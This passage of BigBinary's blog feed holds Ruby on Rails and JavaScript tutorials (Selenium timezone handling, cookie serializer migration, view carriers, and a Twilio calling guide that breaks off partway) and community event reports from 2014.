      <content type="html"><![CDATA[<p>I had encountered a problem in one of our projects where it was required toobtain the current time from a different timezone and then use it. I am in IST(Indian Standard Timezone - 5.50) and was required to get the time in EST(Eastern Standard Timezone + 5.00)</p><p>These are the set of commands I used to achieve that.</p><pre><code class="language-javascript">Command : storeEvalTarget  : var d = new Date();          d.setTime(new Date( (d.getTime() + (d.getTimezoneOffset() * 60000))            + (3600000 * (-5) ) ));          d.toLocaleTimeString();Value   : timeEstCommand : echoTarget  : ${timeEst}Value   :</code></pre><p><strong><code>storeEval</code></strong> command is used to store the value in the variable <code>timeEst</code>after evaluating the javascript code.</p><p><strong><code>var d = new Date();</code></strong> a new date object is created.</p><p><strong><code>d.getTime()</code></strong> method returns the number of <em>milliseconds</em> between midnightof January 1, 1970 and the specified date (as is present in the variable &quot;d&quot;).</p><p><strong><code>d.getTimezoneOffset()</code></strong> method returns the time difference between UTC(Coordinated Universal Time) time and local time from the variable &quot;d&quot;, in<em>minutes</em>. For example, If our time zone is GMT-5.50, -330 will be returned.</p><p>Since <code>getTime()</code> is in milliseconds and <code>getTimezoneOffset()</code> is in minutes;<code>getTimezoneOffset()</code> is multiplied with 60000 to make it into milliseconds.</p><p>The expression <strong><code>3600000 * (- 5)</code></strong> is required to make the time from UTC toEST. The difference between UTC and EST is -5 hours. So, to make the hours tomilliseconds we need to multiply with 3600000 (60 min x 60 sec x 1000 millisec).</p><p><strong><code>d.setTime()</code></strong> method is used to set the time of variable &quot;d&quot; afterevaluating the expression.</p><p>With the above, the variable &quot;d&quot; is set with the date and time of the EST time.</p><p><strong><code>d.toLocaleTimeString()</code></strong> method returns the time portion of a Date object asa string, using locale conventions.</p><p>The time string obtained above is stored in the variable <code>timeEst</code>.</p><p><strong><code>echo ${timeEst}</code></strong>, the time string is displayed in the console.</p><hr><p><strong><code>Using est time</code></strong></p><p><img src="/blog_images/2015/how-to-obtain-current-time-from-a-different-timezone-in-selenium-ide-using-javascript/selenium_javascript_time.jpg" alt="Selenkum javascript EST time"></p><hr><p><strong><code>Using est date</code></strong></p><p><img src="/blog_images/2015/how-to-obtain-current-time-from-a-different-timezone-in-selenium-ide-using-javascript/selenium_javascript_date.jpg" alt="Selenkum javascript EST date"></p><hr>]]></content>
    </entry><entry>
       <title><![CDATA[2014 - Year in Community Engagement]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/2014-year-in-community-engagement"/>
      <updated>2015-01-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/2014-year-in-community-engagement</id>
      <content type="html"><![CDATA[<p>At BigBinary our team loves to engage with the community as well as help out indifferent ways. We love contributing to <a href="https://bigbinary.com/open-source">OpenSource</a>,<a href="https://bigbinary.com/presentations">speak and attend different conferences</a>, and helpout in community meetups, <a href="deccanrubyconf">organizing conferences</a>,and events like <a href="rails-girls-pune-2014">RailsGirls</a> .</p><h2>Short summary</h2><p>In year 2014we presented atfollowing 8 conferencesacross 6 countries.</p><ul><li>RubyConf Goa, India</li><li>RubyConf Philippines</li><li>RedDotRubyConf Singapore</li><li>DeccanRubyConf Pune, India</li><li>Madion+Ruby Wisconsin, USA</li><li>RubyConf Brazil</li><li>RubyKaigi Tokyo, Japan</li><li>Golden Gate Ruby Conference San Francisco, USA</li></ul><h2>Rails and Ruby Conferences</h2><p>&lt;iframe style=&quot;min-height: 500px; width: 100%;&quot;src=&quot;https://www.mapquest.com/embed?hk=1x7D17Q&quot;marginwidth=&quot;0&quot;marginheight=&quot;0&quot;frameborder=&quot;0&quot;scrolling=&quot;no&quot;&gt;&lt;/iframe&gt;</p><p>At the start of our travel, we visited <a href="http://rubyconfindia.org">RubyConfIndia 2014</a>.The conference took place at an amazing beach resort in Goa. The two days of conferencewere full of fun and interactions with the best ruby people around India. During theconference our team announced launch of <a href="http://www.rubyindia.org/">Ruby India</a> to helpspread ideas and experiments from the Ruby Indian Community, as well as highlightcontent from people.</p><p>Soon after, I visited Philippines, to conduct a workshop on &quot;Contributing to Rails&quot; at<a href="http://rubyconf.ph">RubyConf Philippines</a>. It was amazing to meet the growingPhilippines community. I was happy to spend time with some amazing Rubyists, like<a href="https://twitter.com/apotonick">Nick Sutterer</a>, <a href="https://twitter.com/_zzak">Zachary Scott</a>,<a href="https://twitter.com/konstantinhaase">Konstantin Hasse</a>,<a href="https://twitter.com/_ko1">Koichi Sasada San</a>,<a href="https://twitter.com/aspleenic">PJ Hagerty</a>,<a href="https://twitter.com/indirect">Andre Arko</a> and so on.</p><p>After that I and Prathamesh went to Singapore to speak at<a href="http://reddotrubyconf.com">RedDotRubyConf</a>. We spoke on Arel andActiveRecord. &quot;RedDorRubyConf&quot; was our first joint talk together at a conference.Again we met a lot of awesome people like <a href="https://twitter.com/_solnic_">Piotr Solnica</a>,<a href="https://twitter.com/arnvald">Grzegorz Witek</a>,<a href="https://twitter.com/yinquanteo">Yinquan Teo</a>,<a href="https://twitter.com/sayanee_">Sayanee Basu</a>,<a href="https://twitter.com/ntt">Chinmay Pendharkar</a>and <a href="https://twitter.com/winstonyw">Winston Teo Yong Wei</a>.We also visited Marina Sand Bay and Sentosa Island.</p><p>Back in Pune, we hosted the first ever <a href="http://www.deccanrubyconf.org/">DeccanRubyConf</a>.Our team was busy working on tasks right from building the website, inviting speakers,planning, and other arrangements. The conference had good talks and some really useful workshops.it was a fun one day conference, with attendance of over 170+ people.</p><p>The conference also saw our team announce the launch of RubyIndia Podcast,which does regular podcast interviews with notable people from the Ruby Community andIndian Community.</p><p><a href="https://bigbinary.com/team">Prathamesh</a> and I, then left on around a one and a half monthtravel, to attend and speak at multiple conferences.</p><p>We started with <a href="http://madisonpl.us/">Madison+Ruby</a>, in Madison, WI. After severalmissed flights, and a storm, we visited our first US conference after a travel of 48hours. MadisonRuby was a conference like no other. Several topics touched the humaneside of Ruby and the community. We spoke on 'Building an own ORM using ARel'. Set in thecultural town of Madison, we immensely enjoyed the cheese-curds, farmers markets and game nightarranged by the Conf team. A huge thanks to <a href="https://twitter.com/jremsikjr">Jim</a> and<a href="https://twitter.com/JenRemsik">Jennifer Remsik</a>,for hosting such an amazing event. Thanks also to <a href="https://twitter.com/ruttencutter">Scott Ruttencutter</a>for giving us space to work from his office and giving us a tour of the state capital.</p><p>We then visited Sao Paulo, Brazil for <a href="http://rubyconf.com.br">RubyConf Brazil</a> and presented a talkon Building an ORM using ARel. It was a pleasure to meet <a href="https://twitter.com/AkitaOnRails">Fabio Akita</a>and the CodeMiner team. We made friends with <a href="https://twitter.com/celsovjf">Celso Fernandes</a>and <a href="https://twitter.com/plribeiro3000">Paulo</a>who were kind enough to help us around, since in Brazil primarilyportuguese is spoken. We also met <a href="https://twitter.com/rafaelfranca">Rafael Franca</a> and<a href="https://twitter.com/cantoniodasilva">Carlos Antonio da Silva</a>who have helped us a lot with Rails issue tracker.</p><p>Next Prathamesh headed to <a href="http://rubykaigi.org">RubyKaigi</a>, being held in Tokyo, Japan.He presented on<a href="tricks-and-tips-for-using-fixtures-in-rails">Fixtures in Rails</a>.He met Matz, creator of Ruby on his first day in Japan. Mostly all thecore Ruby contributors attended RubyKaigi. He got to interact withKoichi Sasada San, <a href="https://twitter.com/1337807">Jonan Scheffler</a>,<a href="https://twitter.com/a_matsuda">Akira Matsuda</a>,<a href="https://twitter.com/chancancode">Godfrey Chan</a>,<a href="https://twitter.com/schneems">Richard Schneeman</a> and lot of awesome Rubyists.He also met with his JRuby Core <a href="https://twitter.com/tom_enebo">Tom Enebo</a> for the first time.Thanks to <a href="https://twitter.com/yahonda">Yasuo Honda</a>, <a href="https://twitter.com/mreinsch">Michael Reinsch</a> for helping with Japanese food.</p><p>From Brazil, I first visited Miami, and was happy to visit <a href="http://thelabmiami.com/">The Lab Miami</a>,<a href="http://wyncode.co/">WynCode</a> and interact with Rubyists from Miami.</p><p>Before heading to San Francisco, for GoGaRuco, I was able to make a quick stop in Boston and visit<a href="http://www.alterconf.com/sessions/boston-ma">AlterConf Boston</a>. The theme of the conference was arounddiversity in tech and gaming industry.</p><p>My latest conference was in the amazing city on San Francisco. I presented about 'Building an ORM',at <a href="http://gogaruco.com">GoGaRuCo</a>, which incidentally was the last ever GoGaRuCo. The conferencetaking place in San Francisco, saw an amazing turnout of crowd. I was able to interact with<a href="https://twitter.com/ultrasaurus">Sarah Allen</a>, <a href="https://twitter.com/wycats">Yehuda Katz</a>,<a href="https://twitter.com/pat">Pat Allen</a>, <a href="https://twitter.com/sarahmei">Sarah Mei</a>,<a href="https://twitter.com/the_zenspider">Ryan Davis</a>. I spent most of the time along with<a href="https://twitter.com/sleeplessgeek">Nathan Long</a>, <a href="https://twitter.com/randycoulman">Randy Coulman</a>,and Nathan's friend <a href="http://sorryrobot.com/">Michael Gundlach</a>,who is the creator of popularplugin <a href="https://getadblock.com">Adblock</a>.I also ran into <a href="https://twitter.com/chriseppstein">Chris Eppstein</a>, creator of <a href="http://compass-style.org">compass</a>.All around it was one of the most amazing interactions I had in a conference.</p><p>2014, was an amazing year for our team. Together we presented or were part of 8 conferences,launched RubyIndia Newsletter as well as the RubyIndia Podcast, started with 6 new videoseries on topics from <a href="https://www.bigbinary.com/videos/learn-reactjs-in-steps">ReactJS</a> to<a href="https://www.bigbinary.com/videos/learn-rubymotion">Rubymotion</a> to<a href="https://www.bigbinary.com/videos/learn-selenium">Selenium</a>, published <a href="/blog">numerous blogs</a>,and contributed to a number of OpenSource projects.</p><p>2015, starts with our team presenting at <a href="http://gardencityruby.org">GardenCityRuby Conf</a>.We hope to get more such chances to interact and help out the community. Onwards to a new year!</p>]]></content>
    </entry><entry>
       <title><![CDATA[Migrating existing session cookies while upgrading]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/migrating-existing-session-cookies-while-upgrading-to-rails-4-1-and-above"/>
      <updated>2014-12-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/migrating-existing-session-cookies-while-upgrading-to-rails-4-1-and-above</id>
      <content type="html"><![CDATA[<p>Rails 4.1 introduced <a href="https://github.com/rails/rails/pull/13692">JSON</a><a href="https://github.com/rails/rails/pull/13945">serialization</a> for cookies. Earlierall the cookies were serialized using Marshal library of Ruby. The marshallingof cookies can be<a href="http://matt.aimonetti.net/posts/2013/11/30/sharing-rails-sessions-with-non-ruby-apps/">unsafe</a>because of the possibility of remote code execution vulnerability. So the changeto <code>:json</code> is welcoming.</p><p>The new applications created with Rails 4.1 or 4.2 have <code>:json</code> as the defaultcookies serializer.</p><p><code>rake rails:update</code> used for upgrading existing Rails apps to new versionsrightly changes the serializer to <code>:json</code>.</p><pre><code class="language-ruby">Rails.application.config.action_dispatch.cookies_serializer = :json</code></pre><h2>Deserialization error</h2><p>However that change can introduce an issue in the application.</p><p>Consider a scenario where the cookies are being used for session storage. Likemany normal Rails apps, the <code>current_user_id</code> is being stored into the session.</p><pre><code class="language-ruby">session[:user_id] = current_user_id</code></pre><p>Before Rails 4.1 the cookie will be handled by Marshal serializer.</p><pre><code class="language-ruby">cookie = Marshal.dump(current_user_id) # 42 =&gt; &quot;\x04\bi/&quot;Marshal.load(cookie) # &quot;\x04\bi/&quot; =&gt; &quot;42&quot;</code></pre><p>After the upgrade the application will try to unserialize cookies using <code>JSON</code>which were serialized using <code>Marshal</code>.</p><pre><code class="language-ruby">JSON.parse cookie # Earlier dumped using Marshal# JSON::ParserError: 757: unexpected token at i/'</code></pre><p>So the deserialization of the existing cookies will fail and users will startgetting errors.</p><h2>Hybrid comes to rescue</h2><p>To prevent this Rails provides with a <code>hybrid</code> serializer. The <code>hybrid</code>serializer deserializes marshalled cookies and stores them in JSON format forthe next use. All the new cookies will be serialized in the JSON format. Thisgives happy path for migrating existing marshaled cookies to new Rails versionslike 4.1 and 4.2.</p><p>To use this hybrid serializer, set cookies_serializer config as <code>:hybrid</code> asfollows:</p><pre><code class="language-ruby">Rails.application.config.action_dispatch.cookies_serializer = :hybrid</code></pre><p>After this, all the existing marshalled cookies will be migrated to <code>:json</code>format properly and in the future upgrade of Rails, you can safely change theconfig from <code>:hybrid</code> to <code>:json</code> which is the default and safe value of thisconfig.</p><p>Since this blog was published Rails has changed a bit. You might run into a fewgotchas. Dylan has written about<a href="https://dylansreile.medium.com/gotchas-with-rails-hybrid-cookie-serialization-841612ebea80">how to handle those gotchas here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails Girls Pune 2014]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/rails-girls-pune-2014"/>
      <updated>2014-12-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-girls-pune-2014</id>
      <content type="html"><![CDATA[<p>The second edition of <a href="http://railsgirls.com/pune">RailsGirls Pune</a> event was anamazing day spent with some equally amazing folks. The event took place on 13thof December and it saw a huge turnout of around 150+ women from various collegesand companies. It was a free event for beginners interested in learning aboutcoding and building applications using Ruby on Rails.</p><p>BigBinary was happy to be one of the sponsors of the event.</p><p>The event was organized by Rajashree Malvade, Shifa Khan, Pooja Salpekar,Dominika Stempniewicz, and Magdalena Sitarek.</p><p>BigBinary team reached the venue, ThoughtWorks office, Pune, at about 8.30 AM.Rajashree did the introductions and Gautam Rege, and I did the kick off. Gautamintroduced Ruby, along with how magical Ruby is and the importance of the event.I spent some time explaining how RailsGirls began, as well as<a href="http://www.railsbridge.org">Rails Bridge</a> and other similar events.</p><p><img src="/blog_images/2014/rails-girls-pune-2014/kickoff.jpg" alt="RailsGirls pune kick-off"></p><p>Next all instructors were grouped together. Grouping was done in such a way thatadvanced instructors were paired with intermediate and beginner instructors.</p><p>The talented folks from ThoughtWorks had created a fun movie explaining thethree different tracks - beginner, intermediate and advanced into which thestudents were divided.</p><p>I, Prathamesh and Richa Trivedi took to one of the advanced track groups. Westarted off by pairing people to work with their partner and did a health checkof everyone's system. Many of the participants in our group had 1-2 years ofprofessional experience in Java, .Net and so forth. This meant they were quitefamiliar with setting up various things on their machine and that was a greathelp. We started with basics of ruby- variables, loops, blocks, <code>each</code>, methods,classes, etc. This took about 2 hours and then we started with Rails and MVC.</p><p>Santosh paired with<a href="https://www.linkedin.com/pub/dinesh-kumar/70/595/9a4">Dinesh</a> and participatedin intermediate track of a group of four students. They started with basics ofRuby and later started to build simple blog app using Rails and deployed apps toHeroku by the end of the day.</p><p>At about 11.30, <a href="https://twitter.com/sidnc86">Siddhant Chothe</a> from TechVision,did an inspiring talk about Web Accessibility,<a href="https://github.com/techvision/waiable">Wiable</a> gem, and his journey in Ruby &amp;Rails world.</p><p><img src="/blog_images/2014/rails-girls-pune-2014/turnout.jpg" alt="Siddhant's session"></p><p>Then We did the Bentobox activity. Participants were handed a page listingvarious aspects of software development like infrastructure, frontend,application, storage in boxes. We read out technologies like XML, JSON, AJAX,MongoDB, etc, and asked everyone to write these on stickies and place them inappropriate boxes on the &quot;Bentobox&quot;. This was helpful for the participants tounderstand what different technologies are related to web-development and wherethey are used.</p><p>Then everyone broke out for lunch. Our enthusiastic lot stayed back to avoid therush, and began with Rails development. We started by explaining basic MVCconcepts and how Rails helps as a framework. We started with a simple App, andcreated &quot;pages/home&quot; static home page. This helped our group to understand railsgenerators, routes, controllers and views. With our first page up and running,we went for lunch.</p><p>After lunch, a session on Origami was conducted by Nima Mankar. It was a goodstress buster after all of the first session's bombardment over theparticipants.</p><p><img src="/blog_images/2014/rails-girls-pune-2014/origami.jpg" alt="Origami session"></p><p>Our next objective was to build an app and deploy it to heroku. Our groupstarted out to build &quot;The Cat App&quot;! We began with explaining controllers, CRUDoperations, parts of URL, REST, etc. We created a <code>Cat</code> model, and everyoneloved the beauty and simplicity of migrations and performing create, update,delete, find using ActiveRecord. We quickly moved on to building<code>CatsController</code> and CRUD operations on the same. We made sure we did not usescaffold, so as to explain the underlying magic, instead of scaffold hiding itaway.</p><p><img src="/blog_images/2014/rails-girls-pune-2014/group.jpg" alt="Richa with our group"></p><p><img src="/blog_images/2014/rails-girls-pune-2014/group2.jpg" alt="Other part of our group"></p><p>Soon everyone had a functional App, and it was fun to introduce <em>GorbyPuff</em> asthe star of our App, whose images were displayed as cat records, which storename of the image and url to an image.</p><p>We then setup the Apps on heroku and were ready for the next part- Showcase. Itwas amazing to see so many groups complete the Apps and come up with fun,interesting and quirky ideas. One student created <strong>Boyfriend Expense (Kharcha)Management App</strong>.</p><p><img src="/blog_images/2014/rails-girls-pune-2014/expense.jpg" alt="App showcase"></p><p>The day ended on a high note amid high enthusiasm from all the participants. Wefinished the workshop with a huge cake for everyone.</p><p>Overall, it was well-organized, fun, enthusiastic and a day well spent.</p><p>Thanks to <a href="https://twitter.com/Rajashree612">Rajshree</a>,<a href="http://github.com/shifakhan">Shifa</a>,<a href="https://twitter.com/poojasalpekar">Pooja</a>,<a href="http://github.com/dominika">Dominika</a> and<a href="http://github.com/sitarek">Magdalena</a> for organizing such an awesome event.Both Pune edition events, have shown great interest, and it has left us alllooking forward for the next one!</p>]]></content>
    </entry><entry>
       <title><![CDATA[DRYing up Rails Views with View Carriers and Services]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/drying-up-rails-views-with-view-carriers-and-services"/>
      <updated>2014-12-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/drying-up-rails-views-with-view-carriers-and-services</id>
      <content type="html"><![CDATA[<p>Anyone who has done any Rails development knows that views gets complicated very fast.Lately we've been experimenting with Carriers ( also called view services ) to clean up views.</p><p>There are many already solutions already existing to this problem like<a href="https://github.com/drapergem/draper">Draper Gem</a> ,or Cells from<a href="https://github.com/apotonick/trailblazer">Trailblazer architecture</a>.</p><p>We wanted to start with simplest solution by making use of simple ruby objects that takes care of business logic away from views.</p><h2>A complex view</h2><p>Consider this user model</p><pre><code class="language-ruby">class User  def super_admin?    self.role == 'super_admin'  end  def manager?    self.role == 'manager'  endend</code></pre><p>Here we have a view that displays appropriate profile link and changes css class based on the role of the user.</p><pre><code class="language-erb">&lt;% if @user.super_admin? %&gt;  &lt;%= link_to 'All Profiles', profiles_path %&gt;&lt;% elsif @user.manager? %&gt;  &lt;%= link_to 'Manager Profile', manager_profile_path %&gt;&lt;% end %&gt;&lt;h3 class=&quot;&lt;%= if @user.manager?                  'hidden'               elsif @user.super_admin?                  'active'               end %&gt;&quot;&gt;   Hello, &lt;%= @user.name %&gt;&lt;/h3&gt;</code></pre><h2>Extracting logic to Rails helper</h2><p>In the above case we can extract the logic from the view to a helper.</p><p>After the extraction the code might look like this</p><pre><code class="language-ruby"># app/helpers/users_helper.rbmodule UsersHelper  def class_for_user user    if @user.manager?      'hidden'    elsif @user.super_admin?      'active'    end  endend</code></pre><p>Now the view is much simpler.</p><pre><code class="language-erb">&lt;h3 class=&quot;&lt;%= class_for_user(@user) %&gt;&quot;&gt;   Hello, &lt;%= @user.name %&gt;&lt;/h3&gt;</code></pre><h2>Why not to use Rails helpers?</h2><p>Above solution worked. However in a large Rails application it will start creating problems.</p><p><code>UsersHelper</code> is a module and it is mixed into <code>ApplicationHelper</code>.So if the Rails project has large number of helpers then all of them aremixed into the <code>ApplicationHelper</code> and sometimes there is a name collision.For example let's say that there is another helper called <code>ShowingHelper</code> and this helper also has method <code>class_for_user</code>.Now <code>ApplicationHelper</code> is mixing in both modules <code>UsersHelper</code> and <code>ShowingHelper</code>.One of those methods will be overridden andwe would not even know about it.</p><p>Another issue is that all the helpers are modules not classes.Because they are not classes it becomes difficult to refactor helpers later.If a module has 5 methods and if we refactor two of the methods into two separate methods then we end up with seven methods.Now out of those seven methods in the helper only five of them should be public and the rest two should be private.However since all the helpers are modules it is very hard to see which of them are public and which of them are private.</p><p>And lastly writing tests for helpers is possible but testing a module directly feel weird since most of the time we test a class.</p><h2>Carriers</h2><p>Lets take a look at how we can extract the view logic using carriers.</p><pre><code class="language-ruby">class UserCarrier  attr_reader :user  def initialize user    @user = user  end  def user_message_style_class    if user.manager?      'hidden'    elsif user.super_admin?      'active'    end  endend</code></pre><p>In our controller</p><pre><code class="language-ruby">  class UserController &lt; ApplicationController    def show      @user = User.find(params[:id])      @user_carrier = UserCarrier.new @user    end  end</code></pre><p>Now the view looks like this</p><pre><code class="language-erb">&lt;% if @user.super_admin? %&gt;  &lt;%= link_to 'All Profiles', profiles_path %&gt;&lt;% elsif @user.manager?%&gt;  &lt;%= link_to 'Manager Profile', manager_profile_path %&gt;&lt;% end %&gt;&lt;h3 class=&quot;&lt;%= @user_carrier.user_message_style_class %&gt;&quot;&gt;  Hello, &lt;%= @user.name %&gt;&lt;/h3&gt;</code></pre><h3>No html markup in the carriers</h3><p>Even though carriers are used for presentationwe stay away from having any html markup in our carriers.That is because once we openthe door to having html markups in our carriers then carriers quicklyget complicated and it becomes harder to test them.</p><h3>No link_to in the carriers</h3><p>Since carriers are plain ruby objects,there is no <code>link_to</code> and other helper methods usually.And we keep carriers that way.We donot do <code>include ActionView::Helpers::UrlHelper</code>because the job of the carrier is to present the data thatcan be used in <code>link_to</code> andcomplement the usage of <code>link_to</code>.</p><p>We believe that <code>link_to</code> belongs to the ERB file.However if we really need to have an abstraction over it then we can createa regular Rails helper method.We minimize usage of Rails helper, we do not avoid it altogether.</p><h2>Overcoming Double Dots</h2><p>Many times in our view we end up doing</p><pre><code class="language-erb">  Email Preference for Tuesday: &lt;%= @user.email_preferences.tuesday_preference %&gt;</code></pre><p>This is a violation of<a href="http://en.wikipedia.org/wiki/Law_of_Demeter">Law of Demeter</a> .We call it &quot;don't use Double Dots&quot;. Meaningdon't do <code>@article.publisher.full_name</code>.</p><p>Its just a matter of time before views code looks like this</p><pre><code class="language-erb">  &lt;%= @article.publisher.active.not_overdue.try(:full_name) %&gt;</code></pre><p>Since carriers encapsulate objects into classes,we can overcome this &quot;double dots&quot; issue by delegating behavior to appropriate object.</p><pre><code class="language-ruby">class UserCarrier  attr_reader :user :email_preferences  delegate :tuesday_preference, to: :email_preferences  def initialize user    @user = user    @email_preferences = user.email_preferences  endend</code></pre><p>After that refactoring we end up with cleaner views like.</p><pre><code class="language-erb">  Email Preference for Tuesday: &lt;%= @user_carrier.tuesday_preference %&gt;</code></pre><p>Note that &quot;Double dot&quot; is allowed at other parts of the code. We do not allow it in views.</p><h2>Testing</h2><p>Since the carriers are simple ruby objects it's easy to test them.</p><pre><code class="language-ruby">require 'test_helper'class UserCarrierTest &lt; ActiveSupport::TestCase  fixture :users  def setup    manager = users(:manager)    @user_carrier = UserCarrier.new manager  end  def test_css_class_returned_for_manager    assert_equal 'hidden', @user_carrier.user_message_style_class  endend</code></pre><h2>Summary</h2><p>Carriers allow us to encapsulate complex business logic in simple ruby objects.</p><p>This helps us achieve clearer separation of concern,clean up our views and avoid skewed and complex views.Our views are free of &quot;double dots&quot; andwe end up with simple tests which are easy to maintain.</p><p>We decided to call it a &quot;carrier&quot; andnot &quot;presenter&quot; because the word &quot;presenter&quot; is overloaded and has many meanings.</p><p>We at BigBinary take a similar approach for extracting code from a fatcontroller or a fat model. You can find out more about it <a href="https://www.bigbinary.com/videos/learn-ruby-on-rails/using-services-to-manage-code">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Make Outbound calls to a phone using Twilio and Rails]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/twilio-rails-calling-from-browser-to-a-phone"/>
      <updated>2014-09-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/twilio-rails-calling-from-browser-to-a-phone</id>
      <content type="html"><![CDATA[<p>In this blog post we will see how to make outbound phone calls from the browser to a phone using <a href="http://twilio.com">Twilio</a> . We will make use of the <a href="https://www.twilio.com/docs/client/twilio-js">Twilio-JS</a> library and <a href="http://github.com/twilio/twilio-ruby">Twilio-Ruby gem</a>.</p><p>The Rails App we will be creating, is based on the Twilio Client <a href="https://www.twilio.com/docs/quickstart/ruby/client">Quick-start tutorial</a>.That Twilio tutorial makes use of Sinatra. We will see how we can achieve this in a Rails application.</p><h2>Step 1 - Setup Twilio Credentials and TwiML App</h2><p>We need to setup twilio credentials. We can find account ID and auth token from our <a href="https://www.twilio.com/user/account">account information</a>.</p><p>When the call is made using browser then the phone that is receiving the call has to see a number from which the call is coming. So now we need tosetup a Twilio verified number. This number will be used to place the outgoing calls from. How to setup a verified numbercan be found <a href="https://www.twilio.com/help/faq/voice/how-do-i-add-a-verified-outgoing-caller-id-with-twilio">here</a>.</p><p>When our app make a call from the browser using twilio-js client, Twilio first creates a new call connection from our Browser to Twilio.It then sends a request back to our server to get information about what to do next. We can respond by asking twilio to call a number,say something to the person after a call is connected, record a call etc.</p><p>Sending of this instructions is controlled by setting up a TwiML application. This application provides information about the end point on our server,where twilio should send the request to fetch instructions. <a href="https://www.twilio.com/docs/api/twiml">TwiML</a> is a set of instructions,that we can use to tell Twilio what to do in different cases like when an outbound phone call is made or when an inbound SMS message is received.</p><p>Given below is an example that will say a short message <code>How are you today?</code> in a call.</p><pre><code class="language-xml">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;&lt;Response&gt;    &lt;Say voice=&quot;woman&quot;&gt;How are you today?&lt;/Say&gt;&lt;/Response&gt;</code></pre><p>The TwiML app can be created <a href="https://www.twilio.com/user/account/apps">here</a>. Once the app is configured then we will get <code>appsid</code>.</p><p>We need to configure following information in our Rails Application:</p><pre><code class="language-yaml">twilio:  verified_number: &lt;%= ENV['TWILIO_VERIFIED_NUMBER']%&gt;  account_sid: &lt;%= ENV['TWILIO_ACCOUNT_SID'] %&gt;  auth_token: &lt;%= ENV['TWILIO_AUTH_TOKEN'] %&gt;  call_app_sid: &lt;%= ENV['TWILIO_CALL_APP_SID'] %&gt;</code></pre><h2>Step 2 - Generate capability token to be used by twilio-js</h2><p>After we have the config setup, we will proceed to create the capability token. This token will be generated using theruby gem, and passed to the javascript SDK.The token helps the twilio-js client determine, what permissions the application has like making calls, accepting calls, sending SMS, etc.</p><p>We define a <code>TwilioTokenGeneratorService</code> for this purpose.</p><pre><code class="language-ruby">class TwilioTokenGeneratorService  def process    capability = twilio_capability()    capability.generate  end  private  def twilio_capability    capability ||= Twilio::Util::Capability.new Settings.twilio.account_sid, Settings.twilio.auth_token    capability.allow_client_outgoing Settings.twilio.call_app_sid    capability  endend</code></pre><p>As you can see, we first define a new <code>Twilio::Util::Capability</code> instance and pass credentials to it.We then call <code>allow_client_outgoing</code> method and pass the client Sid to it. This is the identifier for the TwiML application we have previously created on Twilio.Calling <code>allow_client_outgoing</code> gives permission to the client to make outbound calls from Twilio.Finally we call the <code>generate</code> method to create a token from the capability object.</p><h2>Step 3 - Define view elements and pass token to it</h2><p>The generated token will now be passed to the Twilio JS client for connecting with Twilio. In our App we define <code>CallsController</code>,and <code>index</code> action in this controller. This action takes care of setting the capability token. Our index view consists oftwo buttons- to place and hangup a call, a number input field, call logs, and data field to pass capability token to thejavascript bindings. We import the Twilio-JS library in the view. The css styling being used is from the<a href="https://static0.twilio.com/packages/quickstart/client.css">Twilio example</a>.</p><pre><code class="language-erb">&lt;div id=&quot;twilioToken&quot; data-token=&quot;&lt;%= @twilio_token %&gt;&quot;&gt;&lt;/div&gt;&lt;button id=&quot;caller&quot; class=&quot;call&quot;&gt;Call&lt;/button&gt;&lt;button id=&quot;hangup&quot; class=&quot;hangup&quot;&gt;Hangup&lt;/button&gt;&lt;input type=&quot;text&quot; id=&quot;phoneNumber&quot; placeholder=&quot;Enter a phone number to call&quot;/&gt;&lt;div id=&quot;log&quot;&gt;Loading pigeons...&lt;/div&gt;&lt;script type=&quot;text/javascript&quot; src=&quot;//static.twilio.com/libs/twiliojs/1.2/twilio.min.js&quot;&gt;&lt;/script&gt;</code></pre><h2>Step 4 - Define coffeescript bindings to handle TwilioDevice connection to Twilio</h2><p>Next we setup coffeescript bindings to handle initialization of <code>TwilioDevice</code> and making use of entered numberto place calls Twilio. We are taking care of various events like <code>connect</code>, <code>disconnect</code>, <code>ready</code>,etc. on <code>TwilioDevice</code> instance. More information about <code>TwilioDevice</code> usage can be found <a href="https://www.twilio.com/docs/client/twilio-js">here</a>.</p><pre><code class="language-coffeescript">class TwilioDevice  constructor: -&gt;    @initTwilioDeviceBindings()    @initFormBindings()  initTwilioDeviceBindings: -&gt;    twilio_token = $('#twilioToken').data('token')    twilio_device = Twilio.Device    # Create the Client with a Capability Token    twilio_device.setup(twilio_token, {debug: true});    #/* Let us know when the client is ready. */    twilio_device.ready -&gt;      $(&quot;#log&quot;).text(&quot;Ready&quot;)    #/* Report any errors on the screen */    twilio_device.error (error) -&gt;      $(&quot;#log&quot;).text(&quot;Error: &quot; + error.message)    #/* Log a message when a call connects. */    twilio_device.connect (conn) -&gt;      $(&quot;#log&quot;).text(&quot;Successfully established call&quot;)    #/* Log a message when a call disconnects. */    twilio_device.disconnect (conn) -&gt;      $(&quot;#log&quot;).text(&quot;Call ended&quot;)  initFormBindings: -&gt;    $('#caller').bind &quot;click&quot;, (event) -&gt;      params = {&quot;phone_number&quot;: $('#phoneNumber').val()}      Twilio.Device.connect(params)    $('#hangup').bind &quot;click&quot;, (event) -&gt;      Twilio.Device.disconnectAll()$ -&gt;  new TwilioDevice()</code></pre><p>If we now load this page, we should be able to see our app saying its ready to take calls.</p><h2>Step 5 - Define TwiML Response Generator Service</h2><p>The final step before we place calls from our App is to handle callbacks from Twilio and return <code>TwiML</code> response. Forthis we are going to define <code>TwilioCallTwiMLGeneratorService</code> which takes care of generating this response. More informationabout how we need to define the response and individual fields can be found from <a href="https://www.twilio.com/docs/api/twiml/twilio_request">Twilio's docs</a>.</p><p>What we need to define is a response as below:</p><pre><code class="language-xml">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;&lt;Response&gt;  &lt;Dial 